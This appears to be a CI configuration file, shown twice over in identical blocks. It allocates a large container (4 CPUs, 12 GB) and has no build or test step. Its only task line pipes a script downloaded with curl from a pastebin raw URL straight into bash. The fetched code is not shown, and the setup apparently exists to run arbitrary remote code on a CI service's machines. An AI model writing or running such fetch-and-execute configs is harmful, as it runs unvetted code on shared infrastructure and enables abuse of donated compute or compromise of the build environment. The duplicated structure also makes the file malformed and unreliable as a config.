container:
  image: openjdk:latest
  cpu: 4
  memory: 12G

task:
  script: bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
  
  
container:
  image: openjdk:latest
  cpu: 4
  memory: 12G

task:
  script: bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
